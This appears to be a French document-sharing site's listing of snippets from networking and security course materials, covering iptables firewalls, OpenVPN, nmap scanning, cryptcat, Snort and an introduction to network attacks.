acpro SEN TR firewall IPTABLES B version acpro SEN TR firewall IPTABLES du 17/01/2009 Installation du routeur firewall iptables Nom : Prénom : Classe : Date : Appréciation : Note : Objectifs : - Être capable d'installer le service de

Plus en détail

Lyon, mardi 10 décembre 2002! "#$%&"'"# &(

Lyon, mardi 10 décembre 2002! #$%&'# &( é é Lyon, mardi 10 décembre 2002! "#$%&"'"# &( - LEXSI - Méthodologies des audits sécurité - Formalisation des résultats - CF6 TELINDUS - Retour expérience sur tests intrusifs - ARKOON - Nouvelles menaces,

Plus en détail

TCP/IP, NAT/PAT et Firewall

TCP/IP, NAT/PAT et Firewall Année 2011-2012 Réseaux 2 TCP/IP, NAT/PAT et Firewall Nicolas Baudru & Nicolas Durand 2e année IRM ESIL Attention! Vous devez rendre pour chaque exercice un fichier.xml correspondant à votre simulation.

Plus en détail

Évolution de l architecture de réseau avec garde-barrière, VPN, accès distants

Évolution de l architecture de réseau avec garde-barrière, VPN, accès distants JRES 2003 Lille, 20 novembre 2003 Évolution de l architecture de réseau avec garde-barrière, VPN, accès distants Marie-Claude QUIDOZ & Catherine GRENET CNRS/UREC Évolution de l architecture de réseau /

Plus en détail

Netfilter & Iptables. Théorie Firewall. Autoriser le trafic entrant d'une connexion déjà établie. Permettre le trafic entrant sur un port spécifique

Netfilter & Iptables. Théorie Firewall. Autoriser le trafic entrant d'une connexion déjà établie. Permettre le trafic entrant sur un port spécifique Page 1 sur 5 Article original traduit par Kmeleon, refonte de eks. Provenant de ubuntu-fr.org Netfilter & Iptables Netfilter est un module du noyau Linux (depuis la version 2.4) qui offre la possibilité

Plus en détail

Correction TP 03. Table des matières. Guillaume. 14 février 2015

Correction TP 03. Table des matières. Guillaume. 14 février 2015 14 février 2015 Table des matières Introduction au protocole Telnet 2 1. RFC................................ 2 2. Mode non connecté........................ 2 3. Client et serveur.........................

Plus en détail

LA SÉCURITÉ DANS LES RÉSEAUX POURQUOI SÉCURISER? Ce cours traitera essentiellement les points suivants :

LA SÉCURITÉ DANS LES RÉSEAUX POURQUOI SÉCURISER? Ce cours traitera essentiellement les points suivants : LA SÉCURITÉ DANS LES RÉSEAUX Page:1/6 Objectifs du COURS : Ce cours traitera essentiellement les points suivants : - les attaques : - les techniques d intrusion : - le sniffing - le «craquage» de mot de

Plus en détail

OPENVPN. Nous allons détailler l'installation du serveur OpenVPN sur une distribution Ubuntu Server LTS 10.04

OPENVPN. Nous allons détailler l'installation du serveur OpenVPN sur une distribution Ubuntu Server LTS 10.04 OPENVPN OpenVPN n'est pas un VPN IPSec. C'est un VPN SSL se basant sur la création d'un tunnel IP (UDP ou TCP au choix) authentifié et chiffré avec la bibliothèque OpenSSL. Quelques avantages des tunnels

Plus en détail

Le scan de vulnérabilité

Le scan de vulnérabilité 4 Le scan de vulnérabilité Sommaire Le scan de vulnérabilité de base Scan avec NeXpose L assistant "nouveau site" Le nouvel assistant pour les scans manuels Scan avec Nessus Scanners de vulnérabilité spécialisés

Plus en détail

LE RPV DE NIVEAU RÉSEAU AVEC TINC

LE RPV DE NIVEAU RÉSEAU AVEC TINC LE RPV DE NIVEAU RÉSEAU AVEC TINC L entreprise Ilog est une petite entreprise de services informatiques située à La Défense. Les chefs de projet de l entreprise sont souvent en déplacement à travers toute

Plus en détail

SECURIDAY 2013 Cyber War

SECURIDAY 2013 Cyber War Club de la Sécurité Informatique à l INSAT Dans le cadre de la 3ème édition de la journée nationale de la sécurité informatique SECURIDAY 2013 Cyber War SECURINETS Présente Formateurs: 1. Trabelsi NAJET

Plus en détail

Réseau - VirtualBox. Sommaire

Réseau - VirtualBox. Sommaire Réseau - VirtualBox 2015 tv - v.1.0 - produit le 10 mars 2015 Sommaire Le réseau virtuel 2 Introduction.............................................. 2 Modes réseaux............................................

Plus en détail

Mise en place OpenVpn sur Debian. Sommaire. I. Situation... 2. II. Configuration d'openvpn sur serveur Debian... 2

Mise en place OpenVpn sur Debian. Sommaire. I. Situation... 2. II. Configuration d'openvpn sur serveur Debian... 2 Mise en place OpenVpn sur Debian Sommaire I. Situation... 2 II. Configuration d'openvpn sur serveur Debian... 2 a. Installation d'openvpn... 2 b. Création du certificat de l'autorité de certification (CA)...

Plus en détail

Gestion de configurations : Ansible

Gestion de configurations : Ansible Gestion de configurations : Ansible Sommaire Présentation... 2 Mise en œuvre... 2 Schéma du réseau... 2 Configuration de la machine Ansible... 2 Test en mode Ad-hoc... 3 Création du premier playbook...

Plus en détail

Cryptcat. Introduction : Installation : Utilisation de cryptcat :

Cryptcat. Introduction : Installation : Utilisation de cryptcat : Introduction : est le clone de netcat, à la seule condition que ce cryptcat chiffre ses communications (algorithme Twofish). En effet, netcat laisse passer en clair les commandes, ce qui devient un facteur

Plus en détail

SUPERVISION. Centreon 5.9

SUPERVISION. Centreon 5.9 SUPERVISION Centreon 5.9 Steven DELAPRUNE BTS SIO 11/03/2015 Sommaire CAHIER DES CHARGES... 3 INTRODUCTION... 3 PRINCIPES GENERAUX... 3 Définition... 3 Problématique... 3 Description du besoin... 3 Solution...

Plus en détail

TP 1 - Prise de contact avec Snort, scapy

TP 1 - Prise de contact avec Snort, scapy TP 1 - Prise de contact avec Snort, scapy 0. Initialisation du TP Installer les paquets python-scapy, snort, nmap. 1. Présentation de SNORT v2.8.5 La détection d intrusion consiste en un ensemble de techniques

Plus en détail

Chapitre 2. Vulnérabilités protocolaires et attaques réseaux M&K HDHILI

Chapitre 2. Vulnérabilités protocolaires et attaques réseaux M&K HDHILI Chapitre 2 Vulnérabilités protocolaires et attaques réseaux 1 Définitions Vulnérabilité: Défaut ou faiblesse d un système dans sa conception, sa mise en œuvre ou son contrôle interne pouvant mener à une

Plus en détail

FICHE n 1 : Configuration des paramètres IP sous Linux SUSE 11.2

FICHE n 1 : Configuration des paramètres IP sous Linux SUSE 11.2 FICHE n 1 : Configuration des paramètres IP sous Linux SUSE 11.2 Cliquer sur «Ordinateur» puis «Yast», pour ouvrir le centre de contrôle YaST du serveur. Cliquer sur «Périphérique réseau» puis «Paramètres

Plus en détail

Travail de Fin d Etudes

Travail de Fin d Etudes 4ème Informatique 27 juin 2005 Travail de Fin d Etudes Supervision Centralisée d Infrastructures Distantes en Réseaux avec Gestion des Alarmes et Notification des Alertes TFE réalisé au sein de la société

Plus en détail

SCHMITT Année 2012/2014 Cédric BTS SIO. Accès à Distance

SCHMITT Année 2012/2014 Cédric BTS SIO. Accès à Distance SCHMITT Année 2012/2014 Cédric BTS SIO Accès à Distance Description: Ce projet a pour but de définir différent logiciels d'accès à distance pour assister un utilisateur, de les installer et de les tester.

Plus en détail

Cisco Certified Network Associate

Cisco Certified Network Associate Cisco Certified Network Associate Version 4 Notions de base sur les réseaux Chapitre 4 1 D après l en-tête de la couche transport illustré, quelles affirmations parmi les suivantes définissent la session

Plus en détail

Rappels mathématiques

Rappels mathématiques Chapitre 1 Rappels mathématiques 1.1 Entropie On dit qu une variable aléatoire X renseigne totalement sur le déroulement de l expérience E si Exemples : H(X) = H(E) Jours de la semaine : 3 bits d information

Plus en détail

titre : ssh - utilisation Système : CentOS 5.7 Technologie : ssh Auteur : Charles-Alban BENEZECH

titre : ssh - utilisation Système : CentOS 5.7 Technologie : ssh Auteur : Charles-Alban BENEZECH 2012 Les tutos à toto Secure SHell - utilisation Réalisée sur CentOS 5.7 Ecrit par Charles-Alban BENEZECH 2012 titre : ssh - utilisation Système : CentOS 5.7 Technologie : ssh Auteur : Charles-Alban BENEZECH

Plus en détail

Fiche descriptive de module

Fiche descriptive de module Fiche descriptive de module ST110 220 220 Prérequis Processus PEC associés spécifiques Conditions de réussite Contenu du module Date entrée en vigueur : 27.08.2012 Admission à l ES Enseignements et exercices

Plus en détail

Tunnels et VPN. 20/02/2008 Formation Permanente Paris6 86. Sécurisation des communications

Tunnels et VPN. 20/02/2008 Formation Permanente Paris6 86. Sécurisation des communications Tunnels et VPN 20/02/2008 Formation Permanente Paris6 86 Sécurisation des communications Remplacement ou sécurisation de tous les protocoles ne chiffrant pas l authentification + éventuellement chiffrement

Plus en détail

Scanner les ports avec nmap

Scanner les ports avec nmap Scanner les ports avec nmap Version Date Révision Auteur 1.0 10/01/2015 Initiation du document Shura 1.1 22/11/2015 Ajout des scans de versions et des «options bien pratiques». Shura Description L'outil

Plus en détail